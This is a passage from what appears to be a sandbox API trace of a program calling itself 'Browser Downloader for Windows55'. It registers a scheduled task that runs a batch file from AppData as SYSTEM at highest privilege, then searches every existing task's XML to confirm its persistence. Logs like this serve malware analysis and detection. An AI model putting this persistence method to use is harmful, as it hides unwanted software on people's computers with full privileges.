2010-10-27T17:18:44.0816608\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-121)\r\n \\Microsoft\\Windows\\WS\\WSTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E52C9A25-F3E8-49E4-BAA7-FAD0EF620129}\r\n \r\n \r\n \r\n") returned 0x0 [0162.526] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-121)\r\n \\Microsoft\\Windows\\WS\\WSTask\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n {E52C9A25-F3E8-49E4-BAA7-FAD0EF620129}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.526] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.526] IUnknown:Release (This=0x929460) returned 0x0 [0162.526] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.526] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.526] IUnknown:Release (This=0x929460) returned 0x0 [0162.526] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.526] IUnknown:Release (This=0x929220) returned 0x0 [0162.526] TaskScheduler:IUnknown:Release (This=0x929170) returned 0x0 [0162.526] IUnknown:Release (This=0x929000) returned 0x0 [0162.526] TaskScheduler:IUnknown:Release (This=0x928f60) returned 0x0 [0162.526] IUnknown:Release (This=0x928e80) returned 0x0 [0162.526] Sleep (dwMilliseconds=0x2710) [0162.528] AllocateAndInitializeSid (in: pIdentifierAuthority=0xce218, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0xce210 | out: pSid=0xce210*=0x3334cac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0162.528] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x3334cac0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0xce490, cchName=0xce20c, ReferencedDomainName=0xce290, cchReferencedDomainName=0xce208, peUse=0xce228 | out: Name="SYSTEM", cchName=0xce20c, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0xce208, peUse=0xce228) returned 1 [0162.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e413d0 [0162.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xf0) returned 0x32e41900 [0162.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x8000) returned 0x32e69ec0 [0162.531] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41900 | out: hHeap=0x2150000) returned 1 [0162.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e69100 [0162.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e67600 [0162.531] ITaskFolder:RegisterTask (in: This=0x9276b0, Path="Browser Downloader for Windows55", XmlText="\n\n1.1.1\nBrowserDownload\nBrowser downloader is a desktop customize tool for your computer. With this tool, you can easily customize every corner of your Windows desktop \n\\BrowserDownload.net\n\n\n\ntrue\n\n\n\n\nHighestAvailable\nNT AUTHORITY\\SYSTEM\nInteractiveToken\n\n\n\nIgnoreNew\nfalse\ntrue\ntrue\ntrue\nfalse\n\x09\n\x09\x09true\n\x09\x09false\n\x09\ntrue\ntrue\nfalse\nfalse\nfalse\nPT0S\n5\n\n\n\n\x09C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\n\n\n\n", flags=6, UserId=0xce7c8*(varType=0x8, wReserved1=0x3330, wReserved2=0x0, wReserved3=0x0, varVal1="SYSTEM", varVal2=0x0), password=0xce7e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=5, sddl=0xce7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), ppTask=0xce760 | out: ppTask=0xce760*=0x928e80) returned 0x0 [0163.115] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e67600 | out: hHeap=0x2150000) returned 1 [0163.115] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e69100 | out: hHeap=0x2150000) returned 1 [0163.115] ITaskFolder:GetTasks (in: This=0x9276b0, flags=1, ppTasks=0xce560 | out: ppTasks=0xce560*=0x928fa0) returned 0x0 [0163.120] IRegisteredTaskCollection:get_Count (in: This=0x928fa0, pCount=0xce558 | out: pCount=0xce558*=2) returned 0x0 [0163.120] IRegisteredTaskCollection:get_Item (in: This=0x928fa0, index=0xce5a8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x7ffb28b208f9), ppRegisteredTask=0xce548 | out: ppRegisteredTask=0xce548*=0x929070) returned 0x0 [0163.120] IRegisteredTask:get_Name (in: This=0x929070, pName=0xce568 | out: pName=0xce568*="Browser Downloader for Windows55") returned 0x0 [0163.120] IRegisteredTask:get_Xml (in: This=0x929070, pXml=0xce540 | out: pXml=0xce540*="\r\n\r\n \r\n 1.1.1\r\n BrowserDownload\r\n Browser downloader is a desktop customize tool for your computer. With this tool, you can easily customize every corner of your Windows desktop\r\n \\Browser Downloader for Windows55\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n") returned 0x0 [0163.122] StrStrIW (lpFirst="\r\n\r\n \r\n 1.1.1\r\n BrowserDownload\r\n Browser downloader is a desktop customize tool for your computer. With this tool, you can easily customize every corner of your Windows desktop\r\n \\Browser Downloader for Windows55\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n" [0163.122] StrStrIW (lpFirst="Browser Downloader for Windows55", lpSrch="Browser Downloader for Windows") returned="Browser Downloader for Windows55" [0163.122] StrStrIW (lpFirst="\r\n\r\n \r\n 1.1.1\r\n BrowserDownload\r\n Browser downloader is a desktop customize tool for your computer. With this tool, you can easily customize every corner of your Windows desktop\r\n \\Browser Downloader for Windows55\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n", lpSrch="SYSTEM") returned 0x0 [0163.122] StrStrIW (lpFirst="\r\n\r\n \r\n 1.1.1\r\n BrowserDownload\r\n Browser downloader is a desktop customize tool for your computer. With this tool, you can easily customize every corner of your Windows desktop\r\n \\Browser Downloader for Windows55\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n", lpSrch="S-1-5-18") returned="S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n true\r\n PT0S\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat\r\n \r\n \r\n" [0163.122] IUnknown:Release (This=0x929070) returned 0x0 [0163.123] IRegisteredTaskCollection:get_Item (in: This=0x928fa0, index=0xce5a8*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x7ffb28b208f9), ppRegisteredTask=0xce548 | out: ppRegisteredTask=0xce548*=0x929070) returned 0x0 [0163.123] IRegisteredTask:get_Name (in: This=0x929070, pName=0xce568 | out: pName=0xce568*="User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}") returned 0x0 [0163.123] IRegisteredTask:get_Xml (in: This=0x929070, pXml=0xce540 | out: pXml=0xce540*="\r\n\r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n Updates out-of-date system feeds.\r\n \\User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}\r\n \r\n \r\n \r\n S-1-5-21-1560258661-3990802383-1811730007-1000\r\n InteractiveToken\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-28T02:09:29+02:00\r\n 2031-09-28T02:09:29+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\msfeedssync.exe\r\n sync\r\n \r\n \r\n") returned 0x0 [0163.126] StrStrIW (lpFirst="\r\n\r\n \r\n XC64ZB\\RDhJ0CNFevzX\r\n Updates out-of-date system feeds.\r\n \\User_Feed_Synchronization-{3C8C073D-3832-49FF-8EB9-CF5FBFBE6112}\r\n \r\n \r\n \r\n S-1-5-21-1560258661-3990802383-1811730007-1000\r\n InteractiveToken\r\n \r\n \r\n \r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2021-09-28T02:09:29+02:00\r\n 2031-09-28T02:09:29+02:00\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\msfeedssync.exe\r\n sync\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.126] IUnknown:Release (This=0x929070) returned 0x0 [0163.126] IUnknown:Release (This=0x928fa0) returned 0x0 [0163.126] ITaskFolder:GetFolders (in: This=0x9276b0, flags=0, ppFolders=0xce548 | out: ppFolders=0xce548*=0x928fa0) returned 0x0 [0163.129] ITaskFolderCollection:get_Count (in: This=0x928fa0, pCount=0xce554 | out: pCount=0xce554*=1) returned 0x0 [0163.130] ITaskFolderCollection:get_Item (in: This=0x928fa0, index=0xce590*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x7ffb28b208f9), ppFolder=0xce540 | out: ppFolder=0xce540*=0x929080) returned 0x0 [0163.130] ITaskFolder:GetTasks (in: This=0x929080, flags=1, ppTasks=0xce3b0 | out: ppTasks=0xce3b0*=0x929120) returned 0x0 [0163.132] IRegisteredTaskCollection:get_Count (in: This=0x929120, pCount=0xce3a8 | out: pCount=0xce3a8*=0) returned 0x0 [0163.132] IUnknown:Release (This=0x929120) returned 0x0 [0163.132] ITaskFolder:GetFolders (in: This=0x929080, flags=0, ppFolders=0xce398 | out: ppFolders=0xce398*=0x929120) returned 0x0 [0163.136] ITaskFolderCollection:get_Count (in: This=0x929120, pCount=0xce3a4 | out: pCount=0xce3a4*=2) returned 0x0 [0163.136] ITaskFolderCollection:get_Item (in: This=0x929120, index=0xce3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce390 | out: ppFolder=0xce390*=0x929290) returned 0x0 [0163.136] ITaskFolder:GetTasks (in: This=0x929290, flags=1, ppTasks=0xce200 | out: ppTasks=0xce200*=0x929340) returned 0x0 [0163.140] IRegisteredTaskCollection:get_Count (in: This=0x929340, pCount=0xce1f8 | out: pCount=0xce1f8*=4) returned 0x0 [0163.140] IRegisteredTaskCollection:get_Item (in: This=0x929340, index=0xce248*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x9294b0) returned 0x0 [0163.140] IRegisteredTask:get_Name (in: This=0x9294b0, pName=0xce208 | out: pName=0xce208*="Office Automatic Updates") returned 0x0 [0163.140] IRegisteredTask:get_Xml (in: This=0x9294b0, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \\Microsoft\\Office\\Office Automatic Updates\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT30M\r\n \r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n P3D\r\n PT15M\r\n \r\n PT30M\r\n PT1H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n") returned 0x0 [0163.143] StrStrIW (lpFirst="\r\n\r\n \r\n 2013-07-10T17:35:18.0059379\r\n Microsoft Office\r\n This task ensures that your Microsoft Office installation can check for updates.\r\n \\Microsoft\\Office\\Office Automatic Updates\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n \r\n 3\r\n PT30M\r\n \r\n true\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T03:00:00\r\n PT4H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n P3D\r\n PT15M\r\n \r\n PT30M\r\n PT1H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /update SCHEDULEDTASK displaylevel=False\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.143] IUnknown:Release (This=0x9294b0) returned 0x0 [0163.143] IRegisteredTaskCollection:get_Item (in: This=0x929340, index=0xce248*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x9294b0) returned 0x0 [0163.143] IRegisteredTask:get_Name (in: This=0x9294b0, pName=0xce208 | out: pName=0xce208*="Office ClickToRun Service Monitor") returned 0x0 [0163.143] IRegisteredTask:get_Xml (in: This=0x9294b0, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \\Microsoft\\Office\\Office ClickToRun Service Monitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30M\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n") returned 0x0 [0163.145] StrStrIW (lpFirst="\r\n\r\n \r\n 2005-10-11T13:21:17-08:00\r\n Microsoft Office\r\n This task monitors the state of your Microsoft Office ClickToRunSvc and sends crash and error logs to Microsoft.\r\n \\Microsoft\\Office\\Office ClickToRun Service Monitor\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT30M\r\n IgnoreNew\r\n true\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n 2010-12-16T04:00:00\r\n \r\n P1D\r\n \r\n PT6H\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\r\n /WatchService\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.146] IUnknown:Release (This=0x9294b0) returned 0x0 [0163.146] IRegisteredTaskCollection:get_Item (in: This=0x929340, index=0xce248*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x9294b0) returned 0x0 [0163.146] IRegisteredTask:get_Name (in: This=0x9294b0, pName=0xce208 | out: pName=0xce208*="OfficeTelemetryAgentFallBack2016") returned 0x0 [0163.146] IRegisteredTask:get_Xml (in: This=0x9294b0, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentFallBack2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n") returned 0x0 [0163.148] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates the background task for Office Telemetry Agent, which scans and uploads usage and error information for Office solutions.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentFallBack2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload mininterval:2880\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.148] IUnknown:Release (This=0x9294b0) returned 0x0 [0163.148] IRegisteredTaskCollection:get_Item (in: This=0x929340, index=0xce248*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce1e8 | out: ppRegisteredTask=0xce1e8*=0x9294b0) returned 0x0 [0163.148] IRegisteredTask:get_Name (in: This=0x9294b0, pName=0xce208 | out: pName=0xce208*="OfficeTelemetryAgentLogOn2016") returned 0x0 [0163.148] IRegisteredTask:get_Xml (in: This=0x9294b0, pXml=0xce1e0 | out: pXml=0xce1e0*="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentLogOn2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n") returned 0x0 [0163.151] StrStrIW (lpFirst="\r\n\r\n \r\n This task initiates Office Telemetry Agent, which scans and uploads usage and error information for Office solutions when a user logs on to the computer.\r\n \\Microsoft\\Office\\OfficeTelemetryAgentLogOn2016\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n PT0S\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n \r\n \r\n \r\n \r\n PT8H\r\n \r\n \r\n \r\n \r\n \r\n C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\msoia.exe\r\n scan upload\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.151] IUnknown:Release (This=0x9294b0) returned 0x0 [0163.151] IUnknown:Release (This=0x929340) returned 0x0 [0163.151] ITaskFolder:GetFolders (in: This=0x929290, flags=0, ppFolders=0xce1e8 | out: ppFolders=0xce1e8*=0x929340) returned 0x0 [0163.152] ITaskFolderCollection:get_Count (in: This=0x929340, pCount=0xce1f4 | out: pCount=0xce1f4*=0) returned 0x0 [0163.152] IUnknown:Release (This=0x929340) returned 0x0 [0163.152] TaskScheduler:IUnknown:Release (This=0x929290) returned 0x0 [0163.152] ITaskFolderCollection:get_Item (in: This=0x929120, index=0xce3e0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppFolder=0xce390 | out: ppFolder=0xce390*=0x929290) returned 0x0 [0163.152] ITaskFolder:GetTasks (in: This=0x929290, flags=1, ppTasks=0xce200 | out: ppTasks=0xce200*=0x929340) returned 0x0 [0163.153] IRegisteredTaskCollection:get_Count (in: This=0x929340, pCount=0xce1f8 | out: pCount=0xce1f8*=0) returned 0x0 [0163.153] IUnknown:Release (This=0x929340) returned 0x0 [0163.153] ITaskFolder:GetFolders (in: This=0x929290, flags=0, ppFolders=0xce1e8 | out: ppFolders=0xce1e8*=0x929340) returned 0x0 [0163.156] ITaskFolderCollection:get_Count (in: This=0x929340, pCount=0xce1f4 | out: pCount=0xce1f4*=84) returned 0x0 [0163.156] ITaskFolderCollection:get_Item (in: This=0x929340, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9294c0) returned 0x0 [0163.156] ITaskFolder:GetTasks (in: This=0x9294c0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929590) returned 0x0 [0163.157] IRegisteredTaskCollection:get_Count (in: This=0x929590, pCount=0xce048 | out: pCount=0xce048*=4) returned 0x0 [0163.157] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.157] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319") returned 0x0 [0163.157] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\r\n \r\n \r\n \r\n") returned 0x0 [0163.158] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.158] IUnknown:Release (This=0x929720) returned 0x0 [0163.158] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.158] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 64") returned 0x0 [0163.158] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {429BC048-379E-45E0-80E4-EB1977941B5C}\r\n \r\n \r\n \r\n") returned 0x0 [0163.160] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n true\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {429BC048-379E-45E0-80E4-EB1977941B5C}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0163.160] IUnknown:Release (This=0x929720) returned 0x0 [0163.160] IRegisteredTaskCollection:get_Item (in: This=0x929590, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929720) returned 0x0 [0163.160] IRegisteredTask:get_Name (in: This=0x929720, pName=0xce058 | out: pName=0xce058*=".NET Framework NGEN v4.0.30319 64 Critical") returned 0x0 [0163.160] IRegisteredTask:get_Xml (in: This=0x929720, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-09-30T14:53:37.9516706\r\n D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)(A;;FRFX;;;LS)\r\n \\Microsoft\\Windows\\.NET Framework\\.NET Framework NGEN v4.0.30319 64 Critical\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2H\r\n 